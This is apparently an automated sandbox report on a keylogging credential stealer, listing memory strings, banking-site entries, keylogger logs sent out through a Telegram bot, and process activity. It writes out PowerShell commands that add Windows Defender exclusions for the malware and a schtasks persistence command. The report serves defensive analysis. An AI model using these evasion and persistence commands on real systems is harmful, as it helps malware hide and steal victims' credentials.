Source: WebData.14.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WebData.14.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: WebData.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C22000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: WebData.14.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WebData.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WebData.14.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WebData.14.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WebData.14.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WebData.14.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WebData.14.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WebData.14.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WebData.14.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: WebData.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WebData.14.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WebData.14.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WebData.14.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWEG
Source: WebData.14.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WebData.14.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WebData.14.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WebData.14.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WebData.14.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WebData.14.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WebData.14.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WebData.14.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: LjlEiSlJe.exe, 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmtools
Source: WebData.14.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: WebData.14.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WebData.14.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WebData.14.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Memory written: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp"
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process created: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"

Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:22]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3291638549.0000000003D43000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:08]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:32]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:28:04]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :59]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:21]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:39]<<Program Manager>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:21]<<Program Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:51]<<Program Manager("MSIE");!B("Android")\|\|D();D();B("Safari")&&(D()\|\|(C()?0:B("Coast"))\|\|(C()?0:B("Opera"))\|\|(C()?0:B("Edge"))\|\|(C()?A("Microsoft Edge"):B("Edg/"))\|\|C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b){a[F]\|=b}:function(a,b){void 0!==a.g?a.g\|=b:Object.defineProperties(a,{g:{value:b,configurable:!0,writable:!0,enumerable:!1}})};function va(a){var b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.call(a)),I(a,b\|1))}
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:59]<<Program Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [8:29:01]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:20]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :48]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:20]<<Program Manager>>0
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:27]<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:27:16]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managertxt2011ko22
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:23]<<Program ManagerH&
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:44]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:14<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 20]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:47]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FC:\Users\user\AppData\Local\Adobe753D193B28082F181D0714131933073708:27:15]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3293275685.0000000005310000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:33]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"ok":true,"result":{"message_id":3910,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232557,"document":{"file_name":"ScreenshotNIwYvUlB.BMP","mime_type":"image/bmp","file_id":"BQACAgQAAxkDAAIPRmdPB621wkyYQwzZN7ujiobUeqXkAAL9FQACM5J4UiMI1MKMdRwaNgQ","file_unique_id":"AgAD_RUAAjOSeFI","file_size":3932214},"caption":"DC-SC:::user-PC\\user\\8.46.123.228","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}6]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:08Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:11]<<Program Manager>>3fbd04f5-b1ed-
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQUWDdOhIko2D+
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:16Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:28<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:27:18]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:27<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:08]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:14Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:41]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 22]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:09]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BC:\Users\user\AppData\Local\CEF[08:27:21]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:42]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 18]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:45]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:10]<<Program Manager>>te
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 27:19]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:50]<<Program Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:08]Poro0dMVZAAL4FQACM5J4UiRdpamhOQ1yNgQ","file_unique_id":"AgAD-BUAAjOSeFI","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.228","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}0-99b9-fca7ff59c113--:32]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, KeyDataPIzkdBls.txt.9.dr	Binary or memory string: [08:28:29]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:23]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:07]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:29:01]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:40]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerF062011ko2
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, KeyDataqJHjVCwP.txt.9.dr	Binary or memory string: [08:27:58]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:38]<<Program Manager>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:12]<<Program ManagerPB6dHy63crr-u_ul7W09sTwrGAAL8FQACM5J4UmW8XisbIuIAATYE","file_unique_id":"AgAD_BUAAjOSeFI","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.228","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}-99b9-fca7ff59c113--f5-b1ed-4060-99b9-fca7ff59c113--:33]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:16]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:38<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:47]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:20]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:25]<<Program Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3293275685.0000000005310000.00000004.00000020.00020000.00000000.sdmp, KeyDataHMEcskyH.txt.14.dr	Binary or memory string: [08:28:39]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:46]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:30]<<Program Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:10]<<Program Manager>>BMP5
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:06]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :27:24]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:28:42]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:22]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003C1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managertxt2011ko2
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:48]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:27:24]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:21]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:32]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:05]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:30]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :16]<<Program Manager>>
